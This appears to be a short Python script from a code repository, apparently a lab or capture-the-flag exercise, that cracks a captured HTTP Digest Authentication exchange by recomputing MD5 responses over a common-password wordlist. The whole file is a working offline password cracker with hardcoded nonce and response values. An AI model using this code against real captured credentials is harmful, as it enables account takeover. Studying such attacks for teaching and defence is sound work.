blob: b24f90eb772846b3041a64aa07b5cdba5467a2e7 (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
|
# HTTP Digest Authentication cracker
import hashlib
username = "travis14"
realm = "Cheese"
nonce = "/DPYEFbSBQA=c06893026441a70acf049b49540e97acd2bdd640"
uri = "/secret/cheese"
qop = "auth"
nc = "00000001"
cnonce = "ZjdlNTk0ZGZmMDQwZTU3OTM2MTIxOGEyNzljNDJlYzc="
response = "872aafc461761e417d2df47b85e43d2b"
# Calculate the response
with open("10k-most-common.txt") as f:
for line in f:
line = line.strip('\n').strip()
ha1 = hashlib.md5((username + ":" + realm + ":" + line).encode('utf-8')).hexdigest()
ha2 = hashlib.md5(("HEAD" + ":" + uri).encode('utf-8')).hexdigest()
response = hashlib.md5((ha1 + ":" + nonce + ":" + nc + ":" + cnonce + ":" + qop + ":" + ha2).encode('utf-8')).hexdigest()
# print(line + ":" + response)
if (response == "872aafc461761e417d2df47b85e43d2b"):
print("Password: " + line)
break
|
